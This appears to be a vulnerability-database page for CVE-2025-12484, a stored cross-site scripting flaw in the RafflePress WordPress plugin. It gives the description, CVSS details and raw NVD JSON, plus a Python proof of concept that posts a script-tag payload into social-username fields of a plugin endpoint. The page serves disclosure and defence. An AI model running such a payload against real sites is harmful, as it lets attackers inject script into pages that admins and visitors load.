Security Vulnerability Report
中文
CVE-2025-12484 CVSS 7.2 HIGH

CVE-2025-12484

Published: 2025-11-19 08:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple social media username parameters in all versions up to, and including, 1.12.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RafflePress插件 <= 1.12.19 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12484 PoC - RafflePress Stored XSS # Target: WordPress site with RafflePress plugin <= 1.12.19 TARGET_URL = "http://target-wordpress-site.com" # XSS payload for social media username fields xss_payload = '<script>alert("XSS")</script>' def exploit_stored_xss(): """ This PoC demonstrates the stored XSS vulnerability in RafflePress plugin. The vulnerability exists in social media username parameters that are not properly sanitized before being stored and displayed. Affected endpoints: - app/entry.php (form submission) - app/rafflepress.php (display logic, lines 539, 543, 547, 551) Attack vector: POST request with malicious username parameters """ # Target WordPress REST API endpoint for RafflePress endpoint = f"{TARGET_URL}/wp-json/rafflepress/v1/entry" # Malicious data with XSS payload in social media username fields data = { 'giveaway_id': 1, 'facebook_username': xss_payload, 'twitter_username': xss_payload, 'instagram_username': xss_payload, 'youtube_username': xss_payload } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: print(f"[*] Sending XSS payload to {TARGET_URL}") print(f"[*] Payload: {xss_payload}") # Send POST request (unauthenticated) response = requests.post(endpoint, json=data, headers=headers, timeout=10) if response.status_code in [200, 201]: print("[+] XSS payload stored successfully!") print("[*] When admin or users view the giveaway page, the XSS will execute.") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-12484 - RafflePress Stored XSS PoC") print("=" * 60) exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12484", "sourceIdentifier": "[email protected]", "published": "2025-11-19T08:15:51.367", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple social media username parameters in all versions up to, and including, 1.12.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/entry.php#L110", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L539", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L543", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L547", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L551", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L555", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L559", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L563", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3398188%40rafflepress&old=3346436%40rafflepress&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7cda6aad-36e1-45c7-af46-a7b90bb2d339?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.